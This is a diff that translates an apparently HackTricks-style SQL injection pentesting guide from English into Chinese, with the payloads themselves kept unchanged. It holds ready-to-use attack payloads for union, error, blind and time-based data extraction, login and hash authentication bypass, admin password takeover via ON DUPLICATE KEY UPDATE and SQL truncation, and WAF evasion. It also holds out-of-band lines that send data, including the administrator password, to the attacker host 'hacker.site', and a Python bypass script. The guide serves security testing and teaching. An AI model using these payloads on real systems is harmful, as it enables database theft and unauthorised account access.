@@ -28,13 +27,11 @@ When a site appears to be **vulnerable to SQL injection (SQLi)** due to unusual
 "))
 `))
 ```
+然后，您需要知道如何**修复查询以避免错误**。为了修复查询，您可以**输入**数据，以便**先前的查询接受新数据**，或者您可以直接**输入**您的数据并**在末尾添加注释符号**。
 
-Then, you need to know how to **fix the query so there isn't errors**. In order to fix the query you can **input** data so the **previous query accept the new data**, or you can just **input** your data and **add a comment symbol add the end**.
-
-_Note that if you can see error messages or you can spot differences when a query is working and when it's not this phase will be more easy._
-
-### **Comments**
+_请注意，如果您能看到错误消息或在查询正常工作与不正常工作时能发现差异，这个阶段将会更容易。_
 
+### **注释**
 ```sql
 MySQL
 #comment
@@ -60,31 +57,27 @@ SQLite
 HQL
 HQL does not support comments
 ```
+### 使用逻辑运算进行确认
 
-### Confirming with logical operations
+确认 SQL 注入漏洞的可靠方法涉及执行 **逻辑运算** 并观察预期结果。例如，当 GET 参数 `?username=Peter` 修改为 `?username=Peter' or '1'='1` 时，如果返回相同的内容，则表明存在 SQL 注入漏洞。
 
-A reliable method to confirm an SQL injection vulnerability involves executing a **logical operation** and observing the expected outcomes. For instance, a GET parameter such as `?username=Peter` yielding identical content when modified to `?username=Peter' or '1'='1` indicates a SQL injection vulnerability.
-
-Similarly, the application of **mathematical operations** serves as an effective confirmation technique. For example, if accessing `?id=1` and `?id=2-1` produce the same result, it's indicative of SQL injection.
-
-Examples demonstrating logical operation confirmation:
+同样，应用 **数学运算** 作为有效的确认技术。例如，如果访问 `?id=1` 和 `?id=2-1` 产生相同的结果，则表明存在 SQL 注入。
 
+演示逻辑运算确认的示例：
 ```
 page.asp?id=1 or 1=1 -- results in true
 page.asp?id=1' or 1=1 -- results in true
 page.asp?id=1" or 1=1 -- results in true
 page.asp?id=1 and 1=2 -- results in false
 ```
-
-This word-list was created to try to **confirm SQLinjections** in the proposed way:
+这个词汇表是为了尝试**确认SQL注入**而创建的：
 
 {% file src="../../images/sqli-logic.txt" %}
 
-### Confirming with Timing
-
-In some cases you **won't notice any change** on the page you are testing. Therefore, a good way to **discover blind SQL injections** is making the DB perform actions and will have an **impact on the time** the page need to load.\
-Therefore, the we are going to concat in the SQL query an operation that will take a lot of time to complete:
+### 使用时间确认
 
+在某些情况下，您**不会注意到任何变化**在您正在测试的页面上。因此，发现盲注入的一个好方法是让数据库执行操作，并对页面加载所需的**时间产生影响**。\
+因此，我们将在SQL查询中连接一个需要很长时间才能完成的操作：
 ```
 MySQL (string concat and logical ops)
 1' + sleep(10)
@@ -106,13 +99,11 @@ SQLite
 1' AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))
 1' AND 123=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
 ```
+在某些情况下，**sleep 函数将不被允许**。然后，您可以使查询**执行复杂操作**，这将需要几秒钟。_这些技术的示例将在每种技术上单独评论（如果有的话）_。
 
-In some cases the **sleep functions won't be allowed**. Then, instead of using those functions you could make the query **perform complex operations** that will take several seconds. _Examples of these techniques are going to be commented separately on each technology (if any)_.
-
-### Identifying Back-end
-
-The best way to identify the back-end is trying to execute functions of the different back-ends. You could use the _**sleep**_ **functions** of the previous section or these ones (table from [payloadsallthethings](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection#dbms-identification):
+### 识别后端
 
+识别后端的最佳方法是尝试执行不同后端的函数。您可以使用上一节的_**sleep**_ **函数**或这些函数（来自 [payloadsallthethings](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection#dbms-identification) 的表）：
 ```bash
 ["conv('a',16,2)=conv('a',16,2)"                   ,"MYSQL"],
 ["connection_id()=connection_id()"                 ,"MYSQL"],
@@ -140,34 +131,32 @@ The best way to identify the back-end is trying to execute functions of the diff
 ["1337=1337",   "MSACCESS,SQLITE,POSTGRESQL,ORACLE,MSSQL,MYSQL"],
 ["'i'='i'",     "MSACCESS,SQLITE,POSTGRESQL,ORACLE,MSSQL,MYSQL"],
 ```
-
-Also, if you have access to the output of the query, you could make it **print the version of the database**.
+此外，如果您可以访问查询的输出，您可以使其**打印数据库的版本**。
 
 > [!NOTE]
-> A continuation we are going to discuss different methods to exploit different kinds of SQL Injection. We will use MySQL as example.
+> 接下来，我们将讨论利用不同类型的SQL注入的不同方法。我们将以MySQL为例。
 
-### Identifying with PortSwigger
+### 使用PortSwigger进行识别
 
 {% embed url="https://portswigger.net/web-security/sql-injection/cheat-sheet" %}
 
-## Exploiting Union Based
+## 利用基于Union的注入
 
-### Detecting number of columns
+### 检测列数
 
-If you can see the output of the query this is the best way to exploit it.\
-First of all, wee need to find out the **number** of **columns** the **initial request** is returning. This is because **both queries must return the same number of columns**.\
-Two methods are typically used for this purpose:
+如果您可以看到查询的输出，这是利用它的最佳方法。\
+首先，我们需要找出**初始请求**返回的**列数**。这是因为**两个查询必须返回相同数量的列**。\
+通常使用两种方法来实现这一目的：
 
 #### Order/Group by
 
-To determine the number of columns in a query, incrementally adjust the number used in **ORDER BY** or **GROUP BY** clauses until a false response is received. Despite the distinct functionalities of **GROUP BY** and **ORDER BY** within SQL, both can be utilized identically for ascertaining the query's column count.
-
+要确定查询中的列数，逐步调整**ORDER BY**或**GROUP BY**子句中使用的数字，直到收到错误响应。尽管**GROUP BY**和**ORDER BY**在SQL中具有不同的功能，但两者可以相同地用于确定查询的列数。
 ```sql
 1' ORDER BY 1--+    #True
 1' ORDER BY 2--+    #True
 1' ORDER BY 3--+    #True
 1' ORDER BY 4--+    #False - Query is only using 3 columns
-                        #-1' UNION SELECT 1,2,3--+    True
+#-1' UNION SELECT 1,2,3--+    True
 ```
 
 ```sql
@@ -175,25 +164,21 @@ To determine the number of columns in a query, incrementally adjust the number u
 1' GROUP BY 2--+    #True
 1' GROUP BY 3--+    #True
 1' GROUP BY 4--+    #False - Query is only using 3 columns
-                        #-1' UNION SELECT 1,2,3--+    True
+#-1' UNION SELECT 1,2,3--+    True
 ```
-
 #### UNION SELECT
 
-Select more and more null values until the query is correct:
-
+选择越来越多的空值，直到查询正确：
 ```sql
 1' UNION SELECT null-- - Not working
 1' UNION SELECT null,null-- - Not working
 1' UNION SELECT null,null,null-- - Worked
 ```
+_您应该使用 `null` 值，因为在某些情况下，查询两侧的列类型必须相同，而 null 在每种情况下都是有效的。_
 
-_You should use `null`values as in some cases the type of the columns of both sides of the query must be the same and null is valid in every case._
-
-### Extract database names, table names and column names
-
-On the next examples we are going to retrieve the name of all the databases, the table name of a database, the column names of the table:
+### 提取数据库名称、表名称和列名称
 
+在接下来的示例中，我们将检索所有数据库的名称、数据库的表名称、表的列名称：
 ```sql
 #Database names
 -1' UniOn Select 1,2,gRoUp_cOncaT(0x7c,schema_name,0x7c) fRoM information_schema.schemata
@@ -204,80 +189,67 @@ On the next examples we are going to retrieve the name of all the databases, the
 #Column names
 -1' UniOn Select 1,2,3,gRoUp_cOncaT(0x7c,column_name,0x7C) fRoM information_schema.columns wHeRe table_name=[table name]
 ```
+_在每个不同的数据库中发现这些数据的方法各不相同，但方法论始终相同。_
 
-_There is a different way to discover this data on every different database, but it's always the same methodology._
+## 利用隐藏的基于联合的注入
 
-## Exploiting Hidden Union Based
+当查询的输出可见，但基于联合的注入似乎无法实现时，这表明存在**隐藏的基于联合的注入**。这种情况通常会导致盲注入的情况。要将盲注入转变为基于联合的注入，需要识别后端的执行查询。
 
-When the output of a query is visible, but a union-based injection seems unachievable, it signifies the presence of a **hidden union-based injection**. This scenario often leads to a blind injection situation. To transform a blind injection into a union-based one, the execution query on the backend needs to be discerned.
+这可以通过使用盲注入技术以及特定于目标数据库管理系统（DBMS）的默认表来实现。为了理解这些默认表，建议查阅目标DBMS的文档。
 
-This can be accomplished through the use of blind injection techniques alongside the default tables specific to your target Database Management System (DBMS). For understanding these default tables, consulting the documentation of the target DBMS is advised.
+一旦提取了查询，就需要调整你的有效载荷以安全地关闭原始查询。随后，将一个联合查询附加到你的有效载荷中，从而利用新可访问的基于联合的注入。
 
-Once the query has been extracted, it's necessary to tailor your payload to safely close the original query. Subsequently, a union query is appended to your payload, facilitating the exploitation of the newly accessible union-based injection.
+有关更全面的见解，请参阅完整文章 [Healing Blind Injections](https://medium.com/@Rend_/healing-blind-injections-df30b9e0e06f)。
 
-For more comprehensive insights, refer to the complete article available at [Healing Blind Injections](https://medium.com/@Rend_/healing-blind-injections-df30b9e0e06f).
-
-## Exploiting Error based
-
-If for some reason you **cannot** see the **output** of the **query** but you can **see the error messages**, you can make this error messages to **ex-filtrate** data from the database.\
-Following a similar flow as in the Union Based exploitation you could manage to dump the DB.
+## 利用基于错误的注入
 
+如果由于某种原因你**无法**看到**查询**的**输出**，但你可以**看到错误消息**，你可以利用这些错误消息来**提取**数据库中的数据。\
+遵循与基于联合的利用相似的流程，你可以成功地转储数据库。
 ```sql
 (select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
 ```
+## 利用盲注
 
-## Exploiting Blind SQLi
-
-In this case you cannot see the results of the query or the errors, but you can **distinguished** when the query **return** a **true** or a **false** response because there are different contents on the page.\
-In this case, you can abuse that behaviour to dump the database char by char:
-
+在这种情况下，您无法看到查询的结果或错误，但您可以**区分**查询何时**返回**一个**真**或**假**的响应，因为页面上的内容不同。\
+在这种情况下，您可以利用这种行为逐字符地转储数据库：
 ```sql
 ?id=1 AND SELECT SUBSTR(table_name,1,1) FROM information_schema.tables = 'A'
 ```
+## 利用错误盲注
 
-## Exploiting Error Blind SQLi
-
-This is the **same case as before** but instead of distinguish between a true/false response from the query you can **distinguish between** an **error** in the SQL query or not (maybe because the HTTP server crashes). Therefore, in this case you can force an SQLerror each time you guess correctly the char:
-
+这是**与之前相同的情况**，但不是区分查询的真/假响应，而是可以**区分**SQL查询中的**错误**与否（可能是因为HTTP服务器崩溃）。因此，在这种情况下，每次正确猜测字符时，您可以强制产生一个SQL错误：
 ```sql
 AND (SELECT IF(1,(SELECT table_name FROM information_schema.tables),'a'))-- -
 ```
+## 利用基于时间的 SQLi
 
-## Exploiting Time Based SQLi
-
-In this case there **isn't** any way to **distinguish** the **response** of the query based on the context of the page. But, you can make the page **take longer to load** if the guessed character is correct. We have already saw this technique in use before in order to [confirm a SQLi vuln](./#confirming-with-timing).
-
+在这种情况下，**没有**任何方法可以根据页面的上下文来**区分**查询的**响应**。但是，如果猜测的字符是正确的，您可以使页面**加载时间更长**。我们之前已经看到过这种技术用于 [确认 SQLi 漏洞](./#confirming-with-timing)。
 ```sql
 1 and (select sleep(10) from users where SUBSTR(table_name,1,1) = 'A')#
 ```
+## 堆叠查询
 
-## Stacked Queries
+您可以使用堆叠查询来**连续执行多个查询**。请注意，尽管后续查询会被执行，但**结果**不会**返回给应用程序**。因此，这种技术主要用于与**盲漏洞**相关的情况，在这种情况下，您可以使用第二个查询触发DNS查找、条件错误或时间延迟。
 
-You can use stacked queries to **execute multiple queries in succession**. Note that while the subsequent queries are executed, the **results** are **not returned to the application**. Hence this technique is primarily of use in relation to **blind vulnerabilities** where you can use a second query to trigger a DNS lookup, conditional error, or time delay.
+**Oracle** 不支持 **堆叠查询**。**MySQL、Microsoft** 和 **PostgreSQL** 支持它们：`QUERY-1-HERE; QUERY-2-HERE`
 
-**Oracle** doesn't support **stacked queries.** **MySQL, Microsoft** and **PostgreSQL** support them: `QUERY-1-HERE; QUERY-2-HERE`
-
-## Out of band Exploitation
-
-If **no-other** exploitation method **worked**, you may try to make the **database ex-filtrate** the info to an **external host** controlled by you. For example, via DNS queries:
+## 脱带利用
 
+如果**没有其他**利用方法**有效**，您可以尝试让**数据库将信息外泄**到您控制的**外部主机**。例如，通过DNS查询：
 ```sql
 select load_file(concat('\\\\',version(),'.hacker.site\\a.txt'));
 ```
-
-### Out of band data exfiltration via XXE
-
+### 通过 XXE 进行带外数据泄露
 ```sql
 a' UNION SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://'||(SELECT password FROM users WHERE username='administrator')||'.hacker.site/"> %remote;]>'),'/l') FROM dual-- -
 ```
+## 自动化利用
 
-## Automated Exploitation
+查看 [SQLMap Cheatsheet](sqlmap/) 以利用 SQLi 漏洞与 [**sqlmap**](https://github.com/sqlmapproject/sqlmap)。
 
-Check the [SQLMap Cheatsheet](sqlmap/) to exploit a SQLi vulnerability with [**sqlmap**](https://github.com/sqlmapproject/sqlmap).
+## 技术特定信息
 
-## Tech specific info
-
-We have already discussed all the ways to exploit a SQL Injection vulnerability. Find some more tricks database technology dependant in this book:
+我们已经讨论了利用 SQL 注入漏洞的所有方法。在本书中找到一些更多依赖于数据库技术的技巧：
 
 - [MS Access](ms-access-sql-injection.md)
 - [MSSQL](mssql-injection.md)
@@ -285,60 +257,51 @@ We have already discussed all the ways to exploit a SQL Injection vulnerability.
 - [Oracle](oracle-injection.md)
 - [PostgreSQL](postgresql-injection/)
 
-Or you will find **a lot of tricks regarding: MySQL, PostgreSQL, Oracle, MSSQL, SQLite and HQL in** [**https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection**](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection)
+或者你会在 [**https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection**](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection) 找到关于 MySQL、PostgreSQL、Oracle、MSSQL、SQLite 和 HQL 的 **大量技巧**。
 
 <figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
 
-​​​​​[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.
+​​​​​[**RootedCON**](https://www.rootedcon.com/) 是 **西班牙** 最相关的网络安全事件，也是 **欧洲** 最重要的事件之一。该大会 **旨在促进技术知识**，是各个学科的技术和网络安全专业人士的一个热烈交流点。
 
 {% embed url="https://www.rootedcon.com/" %}
 
-## Authentication bypass
+## 认证绕过
 
-List to try to bypass the login functionality:
+尝试绕过登录功能的列表：
 
 {{#ref}}
 ../login-bypass/sql-login-bypass.md
 {{#endref}}
 
-### Raw hash authentication Bypass
-
+### 原始哈希认证绕过
 ```sql
 "SELECT * FROM admin WHERE pass = '".md5($password,true)."'"
 ```
-
-This query showcases a vulnerability when MD5 is used with true for raw output in authentication checks, making the system susceptible to SQL injection. Attackers can exploit this by crafting inputs that, when hashed, produce unexpected SQL command parts, leading to unauthorized access.
-
+此查询展示了在身份验证检查中使用MD5并将原始输出设置为true时的漏洞，使系统容易受到SQL注入攻击。攻击者可以通过构造输入来利用这一点，这些输入在哈希后会生成意外的SQL命令部分，从而导致未经授权的访问。
 ```sql
 md5("ffifdyop", true) = 'or'6�]��!r,��b�
 sha1("3fDf ", true) = Q�u'='�@�[�t�- o��_-!
 ```
-
-### Injected hash authentication Bypass
-
+### 注入哈希认证绕过
 ```sql
 admin' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055'
 ```
+**推荐列表**：
 
-**Recommended list**:
-
-You should use as username each line of the list and as password always: _**Pass1234.**_\
-&#xNAN;_(This payloads are also included in the big list mentioned at the beginning of this section)_
+您应该将列表中的每一行用作用户名，密码始终为： _**Pass1234.**_\
+&#xNAN;_(这些有效载荷也包含在本节开头提到的大列表中)_
 
 {% file src="../../images/sqli-hashbypass.txt" %}
 
-### GBK Authentication Bypass
-
-IF ' is being scaped you can use %A8%27, and when ' gets scaped it will be created: 0xA80x5c0x27 (_╘'_)
+### GBK 认证绕过
 
+如果 ' 被转义，您可以使用 %A8%27，当 ' 被转义时，将创建：0xA80x5c0x27 (_╘'_)
 ```sql
 %A8%27 OR 1=1;-- 2
 %8C%A8%27 OR 1=1-- 2
 %bf' or 1=1 -- --
 ```
-
-Python script:
-
+Python 脚本：
 ```python
 import requests
 url = "http://example.com/index.php"
@@ -347,90 +310,76 @@ datas = {"login": chr(0xbf) + chr(0x27) + "OR 1=1 #", "password":"test"}
 r = requests.post(url, data = datas, cookies=cookies, headers={'referrer':url})
 print r.text
 ```
-
-### Polyglot injection (multicontext)
-
+### 多语言注入（多上下文）
 ```sql
 SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/
 ```
+## 插入语句
 
-## Insert Statement
+### 修改现有对象/用户的密码
 
-### Modify password of existing object/user
+为此，您应该尝试**创建一个名为“主对象”的新对象**（在用户的情况下可能是**admin**），修改某些内容：
 
-To do so you should try to **create a new object named as the "master object"** (probably **admin** in case of users) modifying something:
+- 创建名为：**AdMIn**（大小写字母）
+- 创建名为：**admin=**
+- **SQL 截断攻击**（当用户名或电子邮件有某种**长度限制**时）--> 创建名为：**admin \[大量空格] a**
 
-- Create user named: **AdMIn** (uppercase & lowercase letters)
-- Create a user named: **admin=**
-- **SQL Truncation Attack** (when there is some kind of **length limit** in the username or email) --> Create user with name: **admin \[a lot of spaces] a**
+#### SQL 截断攻击
 
-#### SQL Truncation Attack
+如果数据库存在漏洞，并且用户名的最大字符数例如为30，而您想要冒充用户**admin**，请尝试创建一个名为：“_admin \[30个空格] a_”的用户名和任意密码。
 
-If the database is vulnerable and the max number of chars for username is for example 30 and you want to impersonate the user **admin**, try to create a username called: "_admin \[30 spaces] a_" and any password.
+数据库将**检查**输入的**用户名**是否**存在**于数据库中。如果**不存在**，它将**截断****用户名**到**最大允许字符数**（在这种情况下为：“_admin \[25个空格]_”），然后它将**自动删除末尾的所有空格**，在数据库中更新用户“**admin**”的**新密码**（可能会出现一些错误，但这并不意味着这没有成功）。
 
-The database will **check** if the introduced **username** **exists** inside the database. If **not**, it will **cut** the **username** to the **max allowed number of characters** (in this case to: "_admin \[25 spaces]_") and the it will **automatically remove all the spaces at the end updating** inside the database the user "**admin**" with the **new password** (some error could appear but it doesn't means that this hasn't worked).
+更多信息：[https://blog.lucideus.com/2018/03/sql-truncation-attack-2018-lucideus.html](https://blog.lucideus.com/2018/03/sql-truncation-attack-2018-lucideus.html) & [https://resources.infosecinstitute.com/sql-truncation-attack/#gref](https://resources.infosecinstitute.com/sql-truncation-attack/#gref)
 
-More info: [https://blog.lucideus.com/2018/03/sql-truncation-attack-2018-lucideus.html](https://blog.lucideus.com/2018/03/sql-truncation-attack-2018-lucideus.html) & [https://resources.infosecinstitute.com/sql-truncation-attack/#gref](https://resources.infosecinstitute.com/sql-truncation-attack/#gref)
+_注意：在最新的 MySQL 安装中，此攻击将不再按上述方式有效。虽然比较仍然默认忽略尾随空格，但尝试插入一个超过字段长度的字符串将导致错误，插入将失败。有关此检查的更多信息：_ [_https://heinosass.gitbook.io/leet-sheet/web-app-hacking/exploitation/interesting-outdated-attacks/sql-truncation_](https://heinosass.gitbook.io/leet-sheet/web-app-hacking/exploitation/interesting-outdated-attacks/sql-truncation)
 
-_Note: This attack will no longer work as described above in latest MySQL installations. While comparisons still ignore trailing whitespace by default, attempting to insert a string that is longer than the length of a field will result in an error, and the insertion will fail. For more information about about this check:_ [_https://heinosass.gitbook.io/leet-sheet/web-app-hacking/exploitation/interesting-outdated-attacks/sql-truncation_](https://heinosass.gitbook.io/leet-sheet/web-app-hacking/exploitation/interesting-outdated-attacks/sql-truncation)
-
-### MySQL Insert time based checking
-
-Add as much `','',''` as you consider to exit the VALUES statement. If delay is executed, you have a SQLInjection.
+### MySQL 插入基于时间的检查
 
+添加尽可能多的 `','',''` 以退出 VALUES 语句。如果执行了延迟，则您有 SQL 注入。
 ```sql
 name=','');WAITFOR%20DELAY%20'0:0:5'--%20-
 ```
-
 ### ON DUPLICATE KEY UPDATE
 
-The `ON DUPLICATE KEY UPDATE` clause in MySQL is utilized to specify actions for the database to take when an attempt is made to insert a row that would result in a duplicate value in a UNIQUE index or PRIMARY KEY. The following example demonstrates how this feature can be exploited to modify the password of an administrator account:
+`ON DUPLICATE KEY UPDATE` 子句在 MySQL 中用于指定当尝试插入一行导致 UNIQUE 索引或 PRIMARY KEY 中的重复值时，数据库应采取的操作。以下示例演示了如何利用此功能修改管理员账户的密码：
 
-Example Payload Injection:
-
-An injection payload might be crafted as follows, where two rows are attempted to be inserted into the `users` table. The first row is a decoy, and the second row targets an existing administrator's email with the intention of updating the password:
+示例有效负载注入：
 
+有效负载可能被构造如下，其中尝试将两行插入到 `users` 表中。第一行是诱饵，第二行针对现有管理员的电子邮件，目的是更新密码：
 ```sql
 INSERT INTO users (email, password) VALUES ("generic_user@example.com", "bcrypt_hash_of_newpassword"), ("admin_generic@example.com", "bcrypt_hash_of_newpassword") ON DUPLICATE KEY UPDATE password="bcrypt_hash_of_newpassword" -- ";
 ```
+这是它的工作原理：
 
-Here's how it works:
+- 查询尝试插入两行：一行为 `generic_user@example.com`，另一行为 `admin_generic@example.com`。
+- 如果 `admin_generic@example.com` 的行已经存在，`ON DUPLICATE KEY UPDATE` 子句会触发，指示 MySQL 更新现有行的 `password` 字段为 "bcrypt_hash_of_newpassword"。
+- 因此，可以使用 `admin_generic@example.com` 尝试身份验证，密码对应于 bcrypt 哈希（"bcrypt_hash_of_newpassword" 代表新密码的 bcrypt 哈希，应替换为所需密码的实际哈希）。
 
-- The query attempts to insert two rows: one for `generic_user@example.com` and another for `admin_generic@example.com`.
-- If the row for `admin_generic@example.com` already exists, the `ON DUPLICATE KEY UPDATE` clause triggers, instructing MySQL to update the `password` field of the existing row to "bcrypt_hash_of_newpassword".
-- Consequently, authentication can then be attempted using `admin_generic@example.com` with the password corresponding to the bcrypt hash ("bcrypt_hash_of_newpassword" represents the new password's bcrypt hash, which should be replaced with the actual hash of the desired password).
+### 提取信息
 
-### Extract information
-
-#### Creating 2 accounts at the same time
-
-When trying to create a new user and username, password and email are needed:
+#### 同时创建 2 个账户
 
+在尝试创建新用户时，需要用户名、密码和电子邮件：
 ```
 SQLi payload:
 username=TEST&password=TEST&email=TEST'),('otherUsername','otherPassword',(select flag from flag limit 1))-- -
 
 A new user with username=otherUsername, password=otherPassword, email:FLAG will be created
 ```
+#### 使用十进制或十六进制
 
-#### Using decimal or hexadecimal
-
-With this technique you can extract information creating only 1 account. It is important to note that you don't need to comment anything.
-
-Using **hex2dec** and **substr**:
+使用此技术，您可以仅创建 1 个帐户来提取信息。重要的是要注意，您不需要评论任何内容。
 
+使用 **hex2dec** 和 **substr**：
 ```sql
 '+(select conv(hex(substr(table_name,1,6)),16,10) FROM information_schema.tables WHERE table_schema=database() ORDER BY table_name ASC limit 0,1)+'
 ```
-
-To get the text you can use:
-
+要获取文本，您可以使用：
 ```python
 __import__('binascii').unhexlify(hex(215573607263)[2:])
 ```
-
-Using **hex** and **replace** (and **substr**):
-
+使用 **hex** 和 **replace** (以及 **substr**):
 ```sql
 '+(select hex(replace(replace(replace(replace(replace(replace(table_name,"j"," "),"k","!"),"l","\""),"m","#"),"o","$"),"_","%")) FROM information_schema.tables WHERE table_schema=database() ORDER BY table_name ASC limit 0,1)+'
 
@@ -439,34 +388,28 @@ Using **hex** and **replace** (and **substr**):
 #Full ascii uppercase and lowercase replace:
 '+(select hex(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(substr(table_name,1,7),"j"," "),"k","!"),"l","\""),"m","#"),"o","$"),"_","%"),"z","&"),"J","'"),"K","`"),"L","("),"M",")"),"N","@"),"O","$$"),"Z","&&")) FROM information_schema.tables WHERE table_schema=database() ORDER BY table_name ASC limit 0,1)+'
 ```
-
-​
-
 <figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
 
-​​​​​​[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.
+​​​​​​[**RootedCON**](https://www.rootedcon.com/) 是 **西班牙** 最相关的网络安全事件，也是 **欧洲** 最重要的活动之一。 该大会 **旨在促进技术知识**，是各个学科技术和网络安全专业人士的热烈交流平台。
 
 {% embed url="https://www.rootedcon.com/" %}
 
 ## Routed SQL injection
 
-Routed SQL injection is a situation where the injectable query is not the one which gives output but the output of injectable query goes to the query which gives output. ([From Paper](http://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20Routed%20SQL%20Injection%20-%20Zenodermus%20Javanicus.txt))
-
-Example:
+Routed SQL injection 是一种情况，其中可注入查询不是产生输出的查询，而是可注入查询的输出传递给产生输出的查询。 ([来自论文](http://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20Routed%20SQL%20Injection%20-%20Zenodermus%20Javanicus.txt))
 
+示例：
 ```
 #Hex of: -1' union select login,password from users-- a
 -1' union select 0x2d312720756e696f6e2073656c656374206c6f67696e2c70617373776f72642066726f6d2075736572732d2d2061 -- a
 ```
+## WAF 绕过
 
-## WAF Bypass
+[初始绕过来自这里](https://github.com/Ne3o1/PayLoadAllTheThings/blob/master/SQL%20injection/README.md#waf-bypass)
 
-[Initial bypasses from here](https://github.com/Ne3o1/PayLoadAllTheThings/blob/master/SQL%20injection/README.md#waf-bypass)
-
-### No spaces bypass
-
-No Space (%20) - bypass using whitespace alternatives
+### 无空格绕过
 
+无空格 (%20) - 使用空白替代品进行绕过
 ```sql
 ?id=1%09and%091=1%09--
 ?id=1%0Dand%0D1=1%0D--
@@ -475,41 +418,31 @@ No Space (%20) - bypass using whitespace alternatives
 ?id=1%0Aand%0A1=1%0A--
 ?id=1%A0and%A01=1%A0--
 ```
-
-No Whitespace - bypass using comments
-
+无空格 - 使用注释绕过
 ```sql
 ?id=1/*comment*/and/**/1=1/**/--
 ```
-
-No Whitespace - bypass using parenthesis
-
+无空格 - 使用括号绕过
 ```sql
 ?id=(1)and(1)=(1)--
 ```
+### 无逗号绕过
 
-### No commas bypass
-
-No Comma - bypass using OFFSET, FROM and JOIN
-
+无逗号 - 使用 OFFSET、FROM 和 JOIN 绕过
 ```
 LIMIT 0,1         -> LIMIT 1 OFFSET 0
 SUBSTR('SQL',1,1) -> SUBSTR('SQL' FROM 1 FOR 1).
 SELECT 1,2,3,4    -> UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d
 ```
+### 通用绕过
 
-### Generic Bypasses
-
-Blacklist using keywords - bypass using uppercase/lowercase
-
+使用关键字的黑名单 - 使用大写/小写绕过
 ```sql
 ?id=1 AND 1=1#
 ?id=1 AnD 1=1#
 ?id=1 aNd 1=1#
 ```
-
-Blacklist using keywords case insensitive - bypass using an equivalent operator
-
+使用关键字的黑名单不区分大小写 - 使用等效运算符绕过
 ```
 AND   -> && -> %26%26
 OR    -> || -> %7C%7C
@@ -517,48 +450,41 @@ OR    -> || -> %7C%7C
 > X   -> not between 0 and X
 WHERE -> HAVING --> LIMIT X,1 -> group_concat(CASE(table_schema)When(database())Then(table_name)END) -> group_concat(if(table_schema=database(),table_name,null))
 ```
+### 科学计数法 WAF 绕过
 
-### Scientific Notation WAF bypass
-
-You can find a more in depth explaination of this trick in [gosecure blog](https://www.gosecure.net/blog/2021/10/19/a-scientific-notation-bug-in-mysql-left-aws-waf-clients-vulnerable-to-sql-injection/).\
-Basically you can use the scientific notation in unexpected ways for the WAF to bypass it:
-
+您可以在 [gosecure blog](https://www.gosecure.net/blog/2021/10/19/a-scientific-notation-bug-in-mysql-left-aws-waf-clients-vulnerable-to-sql-injection/) 中找到对此技巧的更深入解释。\
+基本上，您可以以意想不到的方式使用科学计数法来绕过 WAF：
 ```
 -1' or 1.e(1) or '1'='1
 -1' or 1337.1337e1 or '1'='1
 ' or 1.e('')=
 ```
+### 绕过列名限制
 
-### Bypass Column Names Restriction
-
-First of all, notice that if the **original query and the table where you want to extract the flag from have the same amount of columns** you might just do: `0 UNION SELECT * FROM flag`
-
-It’s possible to **access the third column of a table without using its name** using a query like the following: `SELECT F.3 FROM (SELECT 1, 2, 3 UNION SELECT * FROM demo)F;`, so in an sqlinjection this would looks like:
+首先，请注意，如果**原始查询和您想要提取标志的表具有相同数量的列**，您可以直接执行：`0 UNION SELECT * FROM flag`
 
+可以使用以下查询**在不使用列名的情况下访问表的第三列**：`SELECT F.3 FROM (SELECT 1, 2, 3 UNION SELECT * FROM demo)F;`，因此在sql注入中，这看起来像：
 ```bash
 # This is an example with 3 columns that will extract the column number 3
 -1 UNION SELECT 0, 0, 0, F.3 FROM (SELECT 1, 2, 3 UNION SELECT * FROM demo)F;
 ```
-
-Or using a **comma bypass**:
-
+或使用 **comma bypass**：
 ```bash
 # In this case, it's extracting the third value from a 4 values table and returning 3 values in the "union select"
 -1 union select * from (select 1)a join (select 2)b join (select F.3 from (select * from (select 1)q join (select 2)w join (select 3)e join (select 4)r union select * from flag limit 1 offset 5)F)c
 ```
+这个技巧来自于 [https://secgroup.github.io/2017/01/03/33c3ctf-writeup-shia/](https://secgroup.github.io/2017/01/03/33c3ctf-writeup-shia/)
 
-This trick was taken from [https://secgroup.github.io/2017/01/03/33c3ctf-writeup-shia/](https://secgroup.github.io/2017/01/03/33c3ctf-writeup-shia/)
-
-### WAF bypass suggester tools
